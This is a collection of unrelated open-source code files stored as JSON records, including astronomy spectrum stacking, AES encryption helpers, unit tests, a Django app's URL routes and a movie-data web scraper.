list_aeff=[obs.aeff for obs in self.obs_list],\n list_livetime=[obs.livetime for obs in self.obs_list],\n list_edisp=[obs.edisp for obs in self.obs_list],\n list_low_threshold=[obs.energy_range[0] for obs in self.obs_list],\n list_high_threshold=[obs.energy_range[1] for obs in self.obs_list],\n )\n irf_stacker.stack_edisp()\n self.stacked_edisp = irf_stacker.stacked_edisp\n\n def stack_gti(self):\n \"\"\"Stack GTI\n \"\"\"\n first_gti = self.obs_list[0].gti\n if first_gti is None:\n self.stacked_gti = None\n else:\n stack_gti = first_gti.copy()\n for obs in self.obs_list[1:]:\n stack_gti = stack_gti.stack(obs.gti)\n self.stacked_gti = stack_gti.union()\n\n def stack_obs(self):\n \"\"\"Create stacked `~gammapy.spectrum.SpectrumDatasetOnOff`.\"\"\"\n self.stacked_obs = SpectrumDatasetOnOff(\n counts=self.stacked_on_vector,\n counts_off=self.stacked_off_vector,\n aeff=self.stacked_aeff,\n edisp=self.stacked_edisp,\n livetime=self.total_livetime,\n mask_safe=np.logical_not(self.stacked_quality),\n acceptance=self.stacked_on_vector.backscal,\n acceptance_off=self.stacked_off_vector.backscal,\n obs_id=[obs.obs_id for obs in self.obs_list],\n gti=self.stacked_gti,\n )\n","sub_path":"gammapy/spectrum/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":34040,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} 
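The gammapy record above estimates its on-region background as alpha * counts_off, where alpha = acceptance / acceptance_off. A minimal, self-contained sketch of that relation (the helper name and the example numbers are illustrative assumptions, not part of the dataset record):

import numpy as np

# Sketch only: alpha is the on/off exposure ratio, and the estimated
# background in the on region is the off counts scaled by alpha,
# mirroring the background property of SpectrumDatasetOnOff above.
def estimated_background(n_off, acceptance, acceptance_off):
    alpha = acceptance / acceptance_off
    return alpha * np.asarray(n_off)

# Example: 10 and 20 off counts with acceptance ratio 1/5 -> [2., 4.]
print(estimated_background([10, 20], 1.0, 5.0))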
+{"seq_id":"121076676","text":"#!/usr/bin/env python3\n# coding: utf_8\n\n\n\"\"\" Command line tool \"\"\"\n\nimport argparse\nimport getpass\nimport os\nfrom argparse import RawTextHelpFormatter\nfrom datetime import datetime\n\nimport colorama\nfrom colorama import Style\nfrom hal.streams.user import UserInput\nfrom models import CanSyncer\n\nDATE_TIME_FORMAT = \"%Y-%m-%d_%H-%M-%S\"\nOUTPUT_LOCATION = os.path.join(\n os.getenv(\"HOME\"),\n \"cansync\",\n datetime.now().strftime(DATE_TIME_FORMAT)\n)\nUSER = UserInput()\nPOSSIBLE_CONVERSION_FORMATS = [\"png\", \"jpg\", \"jpeg\"]\ncolorama.init()\n\n\ndef create_args():\n \"\"\" raise errors if args do not match parameters \"\"\"\n parser = argparse.ArgumentParser(\n usage=\"-n \\n-h for full usage\",\n formatter_class=RawTextHelpFormatter)\n parser.add_argument(\"-i\", dest=\"input_device\",\n help=\"Input device\",\n required=True)\n parser.add_argument(\"-o\", dest=\"output\",\n help=\"Output location\",\n default=OUTPUT_LOCATION,\n required=False)\n parser.add_argument(\"-c\", dest=\"conversion\",\n help=\"If you want to convert pictures from CR2 format\",\n required=False)\n parser.add_argument(\"-e\", dest=\"erase_after\",\n help=\"If you want to erase pictures from device \"\n \"after sync\", required=False)\n return parser\n\n\ndef parse_args(parser):\n \"\"\"\n :param parser: ArgumentParser\n Object that holds cmd arguments.\n :return: tuple\n Values of arguments.\n \"\"\"\n\n args = parser.parse_args()\n\n input_device, output_location, erase_after = \\\n args.input_device, args.output, args.erase_after\n\n input_device = os.path.join(\n \"/media\", getpass.getuser(), input_device\n )\n if not input_device.endswith(\"/\"):\n input_device += \"/\"\n\n assert os.path.exists(input_device)\n\n if not os.path.exists(output_location):\n os.makedirs(output_location)\n\n try:\n conversion = str(args.conversion)\n assert conversion in POSSIBLE_CONVERSION_FORMATS\n except:\n conversion = False\n\n erase_after = bool(USER.is_yes(erase_after))\n\n return str(input_device), str(output_location), conversion, \\\n erase_after\n\n\n# @handle_exceptions\ndef main():\n input_device, output_location, conversion, erase_after = \\\n parse_args(create_args())\n driver = CanSyncer(input_device, output_location, erase_after, conversion)\n\n if USER.get_yes_no(\"Print and verify settings?\"):\n settings = driver.get_settings()\n command = settings[\"command\"]\n output = settings[\"output\"]\n input_device = settings[\"input\"]\n erase = settings[\"erase\"]\n convert = settings[\"convert\"]\n\n pairs = [\n (\"COMMAND\", command),\n (\"OUTPUT\", output),\n (\"INPUT\", input_device),\n (\"ERASE ?\", erase),\n (\"CONVERT ?\", convert)\n ]\n for pair in pairs:\n print(Style.BRIGHT + pair[0] + Style.RESET_ALL + \":\")\n print(\"\\t\", pair[1], \"\\n\")\n\n if USER.get_yes_no(\"Are you sure to continue?\"): # start syncing\n driver.run()\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"cansync/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":3273,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"83697119","text":"# ##### BEGIN GPL LICENSE BLOCK #####\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but 
WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software Foundation,\n# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\n#\n# ##### END GPL LICENSE BLOCK #####\n\n## Build the File Loading Operator, and allows for File Selection\n# By Matti 'Menithal' Lahtinen\n\nimport bpy\n\nimport json\nimport os\n\nfrom hifi_tools.world.scene import *\n\n\ndef load_file(operator, context, filepath=\"\",\n uv_sphere= False,\n join_children=True, \n merge_distance = 0.01, \n delete_interior_faces = True,\n use_boolean_operation = 'NONE'):\n \n json_data = open(filepath).read()\n data = json.loads(json_data)\n \n scene = HifiScene(data, uv_sphere, join_children, merge_distance, delete_interior_faces, use_boolean_operation)\n return {\"FINISHED\"}\n\n","sub_path":"All_In_One/addons/hifi_tools/files/hifi_json/loader.py","file_name":"loader.py","file_ext":"py","file_size_in_byte":1445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"444481923","text":"import unittest\nfrom pydown import heading\n\nimport re\n\nclass HeadingTest(unittest.TestCase):\n\n def test_h1_heading_is_rendered_correctly(self):\n input = 'some heading\\n='\n \n output = heading.render_h1_headings(input)\n\n self.assertEquals(output, '
<h1>some heading</h1>')\n\n    def test_h2_heading_is_rendered_correctly(self):\n        input = 'some heading\\n-'\n        \n        output = heading.render_h2_headings(input)\n\n        self.assertEquals(output, '<h2>some heading</h2>')\n    \n\n    def test_all_headings_are_created_correctly(self):\n        input = '''\\\nh1 heading 1\n==\n\nh2 heading 1\n-\n\nh2 heading 2\n-\nh1 heading 2\n==='''\n\n        output = heading.render_headings(input)\n\n        matches = re.findall('<h1>.*</h1>', output)\n        expected = ['<h1>h1 heading 1</h1>', '<h1>h1 heading 2</h1>']\n        self.assertEquals(matches, expected)\n\n        matches = re.findall('<h2>.*</h2>', output)\n        expected = ['<h2>h2 heading 1</h2>', '<h2>h2 heading 2</h2>
']\n self.assertEquals(matches, expected)\n\n\n def test_should_not_modify_non_heading_lines(self):\n input = 'this is not a heading lol\\n\\nneither is this'\n\n output = heading.render_headings(input)\n\n self.assertEquals(output, input)\n","sub_path":"test/test_heading.py","file_name":"test_heading.py","file_ext":"py","file_size_in_byte":1346,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"173653351","text":"import sys\nimport random\n\nprint(sys.argv)\n\nif len(sys.argv) < 3:\n print(\"Fucked some command line arguments.\\nIt should be number of points and the filename.\")\n exit()\n\nquantity = int(sys.argv[1])\nfile = sys.argv[2]\n\noutput = ''\nfor d in range(1, quantity):\n output += \"{0}\\t{1}\\t{2}\\t{3}\\n\".format(str(d), str(random.random()), str(random.random()), str(random.random()))\n\nwith open(file, \"w\") as misery:\n misery.writelines(output)\n","sub_path":"PointGenerator.py","file_name":"PointGenerator.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"300896683","text":"\"\"\"Result of difference analysis.\"\"\"\n\nfrom enum import IntEnum\n\n\nclass Result:\n \"\"\"\n Result of a difference analysis.\n Contains the compared entities (functions, params, etc.) and optionally\n contains a list of results of underlying entities (e.g. called functions).\n \"\"\"\n class Kind(IntEnum):\n \"\"\"\n Enumeration type for possible kinds of analysis results.\n Sorted by priority for result aggregation.\n \"\"\"\n NONE = 0\n EQUAL = 1\n ASSUMED_EQUAL = 2\n NOT_EQUAL = 3\n UNKNOWN = 4\n TIMEOUT = 5\n ERROR = 6\n\n @staticmethod\n def from_string(string):\n dictionary = {\n \"none\": Result.Kind.NONE,\n \"equal\": Result.Kind.EQUAL,\n \"assumed-equal\": Result.Kind.ASSUMED_EQUAL,\n \"not-equal\": Result.Kind.NOT_EQUAL,\n \"unknown\": Result.Kind.UNKNOWN,\n \"timeout\": Result.Kind.TIMEOUT,\n \"error\": Result.Kind.ERROR\n }\n return dictionary[string]\n\n def __str__(self):\n return self.name.lower().replace(\"_\", \" \")\n\n class Entity:\n \"\"\"\n Compared entity information. This can be e.g. 
a function, a module,\n or a parameter.\n If it is a function, it contains the file of the function.\n \"\"\"\n def __init__(self, name, filename=None, line=None, callstack=None,\n diff_kind=\"function\", covered=False):\n self.name = name\n self.filename = filename\n self.line = line\n self.callstack = callstack\n self.diff_kind = diff_kind\n self.covered = covered\n\n def __init__(self, kind, first_name, second_name, start_time=None,\n stop_time=None):\n self.kind = kind\n self.first = Result.Entity(first_name)\n self.second = Result.Entity(second_name)\n self.diff = None\n self.macro_diff = None\n self.graph = None\n self.inner = dict()\n self.start_time = start_time\n self.stop_time = stop_time\n\n def __str__(self):\n return str(self.kind)\n\n def add_inner(self, result):\n \"\"\"\n Add result of an inner entity.\n The overall current result is updated based on the entity result.\n \"\"\"\n self.inner[result.first.name] = result\n # The current result is joined with the inner result (the result with\n # a higher priority is chosen from the two).\n self.kind = Result.Kind(max(int(self.kind), int(result.kind)))\n # The graph of the latest inner result is the graph of the outer one.\n # Note: this is true because the graph is built incrementally, reusing\n # the already known results from the previous comparison.\n self.graph = result.graph\n\n def report_symbol_stat(self, show_errors=False):\n \"\"\"\n Report symbol statistics.\n Print numbers of equal, non-equal, unknown, and error results with\n percentage that each has from the total results.\n \"\"\"\n total = len(self.inner)\n eq = len([r for r in iter(self.inner.values())\n if r.kind == Result.Kind.EQUAL])\n neq = len([r for r in iter(self.inner.values())\n if r.kind == Result.Kind.NOT_EQUAL])\n unkwn = len([r for r in iter(self.inner.values())\n if r.kind == Result.Kind.UNKNOWN])\n errs = len([r for r in iter(self.inner.values())\n if r.kind in [Result.Kind.ERROR, Result.Kind.TIMEOUT]])\n empty_diff = len([r for r in iter(self.inner.values()) if all(map(\n lambda x: x.diff == \"\", r.inner.values())) and\n r.kind == Result.Kind.NOT_EQUAL])\n if total > 0:\n print(\"Total symbols: {}\".format(total))\n print(\"Equal: {0} ({1:.0f}%)\".format(eq, eq / total * 100))\n print(\"Not equal: {0} ({1:.0f}%)\".format(\n neq, neq / total * 100))\n print(\"(empty diff): {0} ({1:.0f}%)\".format(\n empty_diff, empty_diff / total * 100))\n print(\"Unknown: {0} ({1:.0f}%)\".format(unkwn,\n unkwn / total * 100))\n print(\"Errors: {0} ({1:.0f}%)\".format(errs,\n errs / total * 100))\n if show_errors:\n if unkwn > 0:\n print(\"\\nFunctions that are unknown: \")\n for f, r in sorted(self.inner.items()):\n if r.kind == Result.Kind.UNKNOWN:\n print(f)\n print()\n if errs > 0:\n print(\"\\nFunctions whose comparison ended with an error: \")\n for f, r in sorted(self.inner.items()):\n if r.kind == Result.Kind.ERROR:\n print(f)\n print()\n\n def report_object_stat(self):\n \"\"\"\n Report detailed statistics about compared objects.\n Prints the total count of unique non-equal objects (inner diffs)\n excluding those covered by syntax diffs.\n Also prints the count and percentage of those which are function diffs,\n macro diffs, inline asm diffs and empty diffs.\n \"\"\"\n # Wrapper class to store in set\n class UniqueDiff:\n def __init__(self, res):\n self.res = res\n\n def __eq__(self, other):\n return self.res.first.name == other.res.first.name\n\n def __hash__(self):\n return hash(self.res.first.name)\n\n # Convert inner result to set of unique diffs\n 
unique_diffs = set()\n for _, inner_res_out in self.inner.items():\n for _, inner_res in inner_res_out.inner.items():\n if (inner_res.diff == \"\" and\n inner_res.first.covered):\n continue\n unique_diffs.add(UniqueDiff(inner_res))\n\n # Generate counts\n compared = len(self.graph.vertices)\n total = len(unique_diffs)\n functions = len([r for r in unique_diffs\n if r.res.first.diff_kind == \"function\"])\n types = len([r for r in unique_diffs\n if r.res.first.diff_kind == \"type\"])\n macros = len([r for r in unique_diffs\n if (r.res.first.diff_kind == \"syntactic\" and\n not r.res.first.name.startswith(\"assembly code\"))])\n asm = len([r for r in unique_diffs\n if (r.res.first.diff_kind == \"syntactic\" and\n r.res.first.name.startswith(\"assembly code\"))])\n empty = len([r for r in unique_diffs if r.res.diff == \"\"])\n\n # Print statistics\n if self.start_time and self.stop_time:\n print(\"Elapsed time: {:.2f} s\".format(\n self.stop_time - self.start_time))\n print(\"Functions compared: {}\".format(compared))\n print(\"Total differences: {}\".format(total))\n if total == 0:\n return\n print(\"In functions: {0} ({1:.0f}%)\".format(functions,\n functions / total * 100))\n print(\"In types: {0} ({1:.0f}%)\".format(types,\n types / total * 100))\n print(\"In macros: {0} ({1:.0f}%)\".format(macros,\n macros / total * 100))\n print(\"In inline assembly code: {0} ({1:.0f}%)\".format(asm,\n asm / total * 100))\n print(\"Empty diffs: {0} ({1:.0f}%)\".format(empty,\n empty / total * 100))\n\n def report_stat(self, show_errors=False):\n \"\"\"Reports all statistics.\"\"\"\n self.report_symbol_stat(show_errors)\n print(\"\")\n self.report_object_stat()\n","sub_path":"diffkemp/semdiff/result.py","file_name":"result.py","file_ext":"py","file_size_in_byte":7854,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"55908177","text":"import obspython as obs\r\nfrom pprint import pprint\r\n\r\ndef refresh_pressed(props, prop):\r\n print(\"refresh pressed\")\r\n data = vars(obs)\r\n with open('export1.txt','w') as f:\r\n pprint(data,stream=f,width=100)\r\n\r\ndef script_properties():\r\n props = obs.obs_properties_create()\r\n obs.obs_properties_add_button(props, \"button\", \"Refresh\", refresh_pressed)\r\n return props\r\n","sub_path":"src/export_vars.py","file_name":"export_vars.py","file_ext":"py","file_size_in_byte":389,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"143811168","text":"from model import *\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom torch.autograd import Variable\nimport torchvision.transforms as transforms\nfrom PIL import Image\nimport glob\n\nimport sys\nsys.path.append('utils')\nfrom config import LR, LR_DECAY_EPOCH, NUM_EPOCHS, NUM_IMAGES, MOMENTUM, BATCH_SIZE\n\nsys.path.append('scripts')\nfrom breeds.data_loader import dset_classes, dset_loaders, dset_sizes, dsets, transform\n\ndef imshow(inp, title=None):\n \"\"\"Imshow for Tensor.\"\"\"\n inp = inp.numpy().transpose((1, 2, 0))\n mean = np.array([0.485, 0.456, 0.406])\n std = np.array([0.485, 0.456, 0.406])\n inp = std * inp + mean\n plt.imshow(inp)\n if title is not None:\n plt.title(title)\n\ndef visualize_new(listaSlika, model, num_images=NUM_IMAGES):\n\n images_so_far = 0\n fig_num = 1\n\n plt.ioff()\n fig = plt.figure(fig_num)\n path = \"./pics/breeds/newPics/\"\n\n lista = []\n for slika in listaSlika:\n lista.append(transform['test'](slika))\n\n tenzor = 
torch.stack(lista)\n inputs = Variable(tenzor.cuda())\n outputs = model(inputs)\n _, preds = torch.max(outputs.data, 1)\n\n for j in range(inputs.size()[0]): \n images_so_far += 1\n ax = plt.subplot(num_images//2, 2, images_so_far)\n ax.axis('off')\n ax.set_title('predicted: {}'.format(dset_classes[preds[j]]))\n imshow(inputs.cpu().data[j])\n \n if ((j + 1) % num_images) == 0 or j == inputs.size()[0] - 1:\n fig.savefig(path + str(fig_num) + \"_fig.jpg\")\n plt.close(fig)\n fig_num += 1\n fig = plt.figure(fig_num)\n images_so_far = 0\n\ndef to_np(x):\n return x.data.cpu().numpy()\n\nif __name__ == '__main__':\n model = CNNModel()\n model.cuda().load_state_dict(torch.load('results/breeds/model_breeds.pkl'))\n model.eval()\n\n print(model)\n\n imageList = []\n for filename in glob.glob('testneSlike/*.jpg'):\n im = Image.open(filename)\n imageList.append(im)\n\n visualize_new(imageList, model)\n \n","sub_path":"projekt/scripts/breeds/test_model.py","file_name":"test_model.py","file_ext":"py","file_size_in_byte":2059,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"378935629","text":"import cv2\nprint('cv2 version:', cv2.__version__)\ndispW = 640\ndispH = 512\nflip=2\ndef nothing(x):\n pass\ncamNumber = 0\n#cam=cv2.VideoCapture(camSet)\ncam = cv2.VideoCapture(camNumber)\ncv2.namedWindow('FLIRcamera')\ncv2.createTrackbar('xVal','FLIRcamera',0,dispW,nothing)\ncv2.createTrackbar('yVal','FLIRcamera',0,dispH,nothing)\n\nwhile True:\n ret,frame = cam.read()\n xVal = cv2.getTrackbarPos('xVal','FLIRcamera')\n yVal = cv2.getTrackbarPos('yVal','FLIRcamera')\n cv2.circle(frame,(xVal,yVal),5,(255,0,0),-1)\n\n \n print(xVal,yVal)\n cv2.imshow('FLIRcamera',frame)\n cv2.moveWindow('FLIRcamera',0,0)\n if cv2.waitKey(1)==ord('q'):\n break\n\ncam.release()\ncv2.destroyAllWindows()","sub_path":"openCV/openCV7-trackBar.py","file_name":"openCV7-trackBar.py","file_ext":"py","file_size_in_byte":701,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"202173377","text":"import os\n\nfrom cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes\nfrom cryptography.hazmat.backends import default_backend\nfrom collections import Counter\n\nfrom fn import *\n\nbackend = default_backend()\n\n# the base aes128 block function\ndef aes_encrypt_block(key, data):\n assert(len(key) == 16)\n assert(len(data) == 16)\n\n cipher = Cipher(algorithms.AES(key), modes.ECB(), backend=backend)\n c = cipher.encryptor()\n return c.update(data) + c.finalize()\n\ndef aes_decrypt_block(key, data):\n assert(len(key) == 16)\n assert(len(data) == 16)\n\n cipher = Cipher(algorithms.AES(key), modes.ECB(), backend=backend)\n d = cipher.decryptor()\n return d.update(data) + d.finalize()\n\n# PKCS#7 padding\ndef pad(data, blocksize):\n missing = blocksize - (len(data) % blocksize)\n\n data = bytearray(data)\n for _ in range(missing):\n data.append(missing)\n return data\n\ndef unpad(data):\n last = data[-1]\n # padding should be all the same byte:\n assert len((set(data[-last:]))) == 1\n return data[:-last]\n\ndef ecb_encrypt(key, data):\n ret = bytearray()\n for chunk in chunky(pad(data, 16), 16):\n ret += aes_encrypt_block(key, chunk)\n return ret\n\ndef ecb_decrypt(key, data):\n ret = bytearray()\n for chunk in chunky(data, 16):\n ret += aes_decrypt_block(key, chunk)\n return unpad(ret)\n\ndef cbc_encrypt(key, iv, data):\n ret = bytearray()\n for chunk in chunky(pad(data, 16), 16):\n ct = aes_encrypt_block(key, xor(chunk, iv))\n 
iv = ct\n ret += ct\n return ret\n\ndef cbc_decrypt(key, iv, data):\n ret = bytearray()\n for chunk in chunky(data, 16):\n plain = xor(iv,aes_decrypt_block(key, chunk))\n iv = chunk\n ret += plain\n return unpad(ret)\n\n# If a block repeats, it's probably ECB mode:\ndef check_ecb(data):\n chunks=list(chunky(bytes(data),16))\n c = Counter(chunks)\n for f in c:\n if c[f] > 1:\n return True\n return False\n\n# Write a function to generate a random AES key; that's just 16 random bytes.\ndef rkey():\n return os.urandom(16)\n","sub_path":"aes.py","file_name":"aes.py","file_ext":"py","file_size_in_byte":1984,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"292927238","text":"#기계를 구입하려 하는데 이 기계는 추가 부품을 장착할 수 있다.\r\n# 추가 부품은 종류당 하나씩만 장착 가능하고, 모든 추가 부품은 동일한 가격을 가진다.\r\n#원래 기계의 가격과 성능, 추가 부품의 가격과 각 부품의 성능이 주어졌을 때,\r\n# 추가 부품을 장착하여 얻을 수 있는 최대 가성비를 정수 부분까지 구하시오(가격 및 성능은 상대적인 값으로 수치화되어 주어진다).\r\nop = 10\r\na = 150\r\nnp = 3\r\nna = [30, 70, 15, 40, 65]\r\n\r\nna.sort(reverse=True)\r\n\r\nfor i in na:\r\n if a / op > (a + i) / (op + np) :\r\n break\r\n else : a +=i ; op += np\r\n\r\nprint(int(a/op))","sub_path":"2 가성비 최대화.py","file_name":"2 가성비 최대화.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"417983770","text":"from django.urls import path\n\nfrom .views import novo_personagem, PersonagemList, PersonagemDetail, DeletePersongem, personagem_selecionado, \\\n duelo, atacar_pve, curar\n\nurlpatterns = [\n path('listar', PersonagemList.as_view(), name='lista_personagens'),\n path('novo', novo_personagem, name='novo_personagem'),\n path('datalhe/', PersonagemDetail.as_view(), name='detalhe_personagem'),\n path('deletar/', DeletePersongem.as_view(), name='deletar_personagem'),\n path('selecionar/', personagem_selecionado, name='selecionado'),\n path('duelo//', duelo, name='duelo'),\n path('atacar_pve/', atacar_pve, name='atacar'),\n path('curar/', curar, name='curar')\n\n]","sub_path":"core/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":742,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"151489233","text":"import requests\nimport os\nimport json\n\nfrom bs4 import BeautifulSoup as bs\nfrom datetime import datetime\n\n\ndef insert_comma(n):\n # 음수일 경우를 고려\n if n[0] == '-':\n return '-' + insert_comma(n[1:])\n if len(n) <= 3:\n return n\n if n.find('.') == -1:\n return insert_comma(n[:-3]) + ',' + n[-3:]\n else:\n return insert_comma(n[:n.find('.')]) + n[n.find('.'):]\n\n\ndef beautify(url, selector):\n response = requests.get(url).text\n bs_response = bs(response, 'html.parser')\n result = bs_response.select_one(selector)\n return result\n \n \ndef trimming(string):\n string = string.replace(u'\\xa0', u' ')\n string = string.replace(u'\\r', u' ')\n \n return string\n\n\ndef get_score_or_0(score):\n if score == None:\n return 0\n else:\n return score.text[7:-1]\n\n\ndef save_data(name, data):\n daily[name] = data\n\n\ndef get_trailer():\n youtubeSearchBaseUrl = \"https://www.youtube.com/results?search_query=\"\n \n if daily['nations'][0]['nationNm'] == '한국':\n youtubeSearchUrl = youtubeSearchBaseUrl + daily[\"movieNm\"] + \" \" + \"예고편\"\n else:\n youtubeSearchUrl = youtubeSearchBaseUrl + daily[\"movieNmEn\"] + \" \" + \"trailer\"\n \n response = requests.get(youtubeSearchUrl).text\n res = bs(response,'html.parser')\n results = res.find_all('a')\n \n for result in results:\n if 
'/watch?v=' in result.get('href'):\n return result.get('href')[9:]\n \n \ndef single_to_double(string):\n string = string.replace(\"'\",'\"')\n return string\n \n \n\n# BASE\nKOFIC_MOVIE_TOKEN = os.getenv('KOFIC_MOVIE_TOKEN')\nYESTERDAY = int(datetime.today().strftime('%Y%m%d')) - 1\nNAVER_MOVIE_BASE_URL = 'https://movie.naver.com/movie'\n\n\n\n# KOFIC Daily Box Office(DBO)\n# DBO_url = f'http://www.kobis.or.kr/kobisopenapi/webservice/rest/boxoffice/searchDailyBoxOfficeList.json?key={KOFIC_MOVIE_TOKEN}&targetDt=20180713'\n# DBO_url = f'http://www.kobis.or.kr/kobisopenapi/webservice/rest/boxoffice/searchDailyBoxOfficeList.json?key={KOFIC_MOVIE_TOKEN}&targetDt=20180913'\n# DBO_url = f'http://www.kobis.or.kr/kobisopenapi/webservice/rest/boxoffice/searchDailyBoxOfficeList.json?key={KOFIC_MOVIE_TOKEN}&targetDt=20180113'\n# DBO_url = f'http://www.kobis.or.kr/kobisopenapi/webservice/rest/boxoffice/searchDailyBoxOfficeList.json?key={KOFIC_MOVIE_TOKEN}&targetDt=20190313'\nDBO_url = f'http://www.kobis.or.kr/kobisopenapi/webservice/rest/boxoffice/searchDailyBoxOfficeList.json?key={KOFIC_MOVIE_TOKEN}&targetDt=20190513'\nDBO_response = requests.get(DBO_url)\ndaily_lists = DBO_response.json()['boxOfficeResult']['dailyBoxOfficeList'] # JSON File\n\n\n\nfor daily in daily_lists:\n # audiAcc 단위수 조절\n # daily['audiAcc'] = insert_comma(daily['audiAcc'])\n\n\n\n # 영화 데이터 추가\n movie_info_url = f'http://www.kobis.or.kr/kobisopenapi/webservice/rest/movie/searchMovieInfo.json?key={KOFIC_MOVIE_TOKEN}&movieCd={daily[\"movieCd\"]}'\n movie_info_response = requests.get(movie_info_url).json()[\"movieInfoResult\"][\"movieInfo\"]\n daily.update(movie_info_response)\n\n\n\n # 영화 URL 뒷 부분 찾기\n \"\"\" \n ex.\n NAVER_MOVIE_BASE_URL 뒤에 \"/movie/bi/mi/basic.nhn?code=136900\"(어벤져스: 엔드게임)를 찾기 위한 코드.\n \"\"\"\n SEARCH_BASE_url = f'{NAVER_MOVIE_BASE_URL}/search/result.nhn?query={daily[\"movieNm\"]}§ion=all&ie=utf8'\n SEARCH_BASE_selector = '#old_content > ul.search_list_1 > li > dl > dt > a'\n SEARCH_BASE_result = beautify(SEARCH_BASE_url, SEARCH_BASE_selector).get('href')\n\n\n\n # 찾은 영화에서 데이터 추출(basic)\n SEARCH_BASIC_url = f'{NAVER_MOVIE_BASE_URL}{SEARCH_BASE_result}'\n SEARCH_BASIC_selector_posterUrl = '#content > div.article > div.mv_info_area > div.poster > a > img'\n SEARCH_BASIC_selector_description = '#content > div.article > div.section_group.section_group_frst > div:nth-child(1) > div > div.story_area > p'\n SEARCH_BASIC_selector_score = '#actualPointPersentBasic > div > span > span'\n\n posterUrl = beautify(SEARCH_BASIC_url, SEARCH_BASIC_selector_posterUrl).get('src')\n description = trimming(beautify(SEARCH_BASIC_url, SEARCH_BASIC_selector_description).text)\n score = get_score_or_0(beautify(SEARCH_BASIC_url, SEARCH_BASIC_selector_score))\n\n save_data(\"posterUrl\", posterUrl)\n save_data(\"description\", description)\n save_data(\"score\", score)\n\n\n\n # 찾은 영화에서 데이터 추출(photoView)\n SEARCH_PHOTOVIEW_stillCut = SEARCH_BASIC_url.replace('basic','photoView')\n \n stillCuts = []\n for i in range(1,4):\n SEARCH_PHOTOVIEW_selector_stillCut = f'#photo_area > div > div.list_area._list_area > div > ul > li:nth-child({i})'\n stillCut = json.loads(beautify(SEARCH_PHOTOVIEW_stillCut,SEARCH_PHOTOVIEW_selector_stillCut).get('data-json'))['fullImageUrl665px']\n stillCuts.append(stillCut)\n save_data(\"stillCuts\", stillCuts)\n\n\n # Youtube에서 트레일러 ID 가져오기\n trailer = get_trailer()\n save_data('trailer', trailer)\n\n\n\n # daily 결과 값 예시\n \"\"\"\n ex. 
daily\n {\n \"rnum\": \"1\",\n \"rank\": \"1\",\n \"rankInten\": \"0\",\n \"rankOldAndNew\": \"OLD\",\n # \"movieCd\": \"20184889\",\n # \"movieNm\": \"어벤져스: 엔드게임\",\n # \"openDt\": \"20190424\",\n \"salesAmt\": \"738244210\",\n \"salesShare\": \"39.8\",\n \"salesInten\": \"-1923986000\",\n \"salesChange\": \"-72.3\",\n \"salesAcc\": \"112507888440\",\n \"audiCnt\": \"82379\",\n \"audiInten\": \"-208402\",\n \"audiChange\": \"-71.7\",\n # \"audiAcc\": \"12882040\",\n \"scrnCnt\": \"1537\",\n \"showCnt\": \"5771\",\n # \"movieNmEn\": \"Avengers: Endgame\",\n \"movieNmOg\": \"\",\n # \"showTm\": \"180\",\n \"prdtYear\": \"2018\",\n \"prdtStatNm\": \"개봉\",\n \"typeNm\": \"장편\",\n # \"nations\": [\n # {\n # \"nationNm\": \"미국\"\n # }\n # ],\n # \"genres\": [\n # {\n # \"genreNm\": \"액션\"\n # },\n # {\n # \"genreNm\": \"SF\"\n # }\n # ],\n # \"directors\": [\n # {\n # \"peopleNm\": \"안소니 루소\",\n # \"peopleNmEn\": \"Anthony Russo\"\n # },\n # {\n # \"peopleNm\": \"조 루소\",\n # \"peopleNmEn\": \"Joe Russo\"\n # }\n # ],\n # \"actors\": [\n # {\n # \"peopleNm\": \"로버트 다우니 주니어\",\n # \"peopleNmEn\": \"Robert Downey Jr.\",\n # \"cast\": \"\",\n # \"castEn\": \"\"\n # },\n # {\n # \"peopleNm\": \"크리스 에반스\",\n # \"peopleNmEn\": \"Chris Evans\",\n # \"cast\": \"\",\n # \"castEn\": \"\"\n # },\n # {\n # \"peopleNm\": \"마크 러팔로\",\n # \"peopleNmEn\": \"Mark Ruffalo\",\n # \"cast\": \"\",\n # \"castEn\": \"\"\n # },\n # {\n # \"peopleNm\": \"크리스 헴스워스\",\n # \"peopleNmEn\": \"Chris Hemsworth\",\n # \"cast\": \"\",\n # \"castEn\": \"\"\n # },\n # {\n # \"peopleNm\": \"스칼렛 요한슨\",\n # \"peopleNmEn\": \"Scarlett Johansson\",\n # \"cast\": \"\",\n # \"castEn\": \"\"\n # },\n # {\n # \"peopleNm\": \"제레미 레너\",\n # \"peopleNmEn\": \"Jeremy 